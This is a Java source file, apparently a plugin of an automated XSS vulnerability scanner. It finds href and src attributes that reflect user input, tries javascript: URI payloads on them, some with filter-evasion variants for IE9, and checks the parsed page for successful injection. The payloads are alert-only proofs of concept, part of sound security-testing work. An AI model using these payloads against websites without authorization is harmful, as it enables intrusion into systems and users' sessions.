package com.vulnit.projects.xss.plugins;

import java.util.LinkedList;
import java.util.List;

import org.jsoup.nodes.Attribute;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;

/**
 * Find XSS in src or href values (eg: <tag src="injected_value">)
 * 
 * @author rmillet
 * 
 */
public final class HrefSrcValuePlugin extends Plugin {
	private String value;
	private final List<String> values = new LinkedList<String>();

	@Override
	public String getInitialPayload(Elements elements, String searchText) {
		this.values.clear();
		for (Element element : elements) {
			for (Attribute attr : element.attributes()) {
				if ((attr.getKey().equals("href") || attr.getKey().equals("src"))
						&& attr.getValue().startsWith(searchText)) {
					this.value = "javascript:alert('" + Plugin.Tag + "');";
					this.values.add("javascript:alert(\"" + Plugin.Tag + "\");");
					this.values.add("javascript:alert(&#39;" + Plugin.Tag + "&#39;);");

					// Work on IE9
					this.values.add("javas\ncript:alert(" + Plugin.NumTag + ")");
					this.values.add("  &#14;  javascript:alert(" + Plugin.NumTag + ");");
					return this.value;
				}
			}
		}
		return null;
	}

	@Override
	public String getPayload() {
		if (!this.values.isEmpty()) {
			this.value = this.values.remove(0);
			return this.value;
		}
		return null;
	}

	@Override
	public boolean isInjectionSuccessful(Document document) {
		Elements e = document.getElementsByAttribute("src");
		e.addAll(document.getElementsByAttribute("href"));
		for (Element element : e) {
			if (element.attr("src").startsWith(this.value) || element.attr("href").startsWith(this.value)) {
				return true;
			} else if (element.attr("src").matches(
					"(?i)javascript:alert\\(&[#0-9a-z]+;" + Tag + "&[#0-9a-z]+;\\);.*") || element.attr("href").matches(
							"(?i)javascript:alert\\(&[#0-9a-z]+;" + Tag + "&[#0-9a-z]+;\\);.*")) {
				// TODO: Quotes encoded
				return true;
			} else if (element.attr("src").matches(
					"(?i)javascript:alert\\(\\\\[\"']" + Tag + "\\\\[\"']\\);.+") || element.attr("href").matches(
							"(?i)javascript:alert\\(\\\\[\"']" + Tag + "\\\\[\"']\\);.+")) {
				// TODO: Quotes escaped
				return false;
			}
		}
		return false;
	}

}
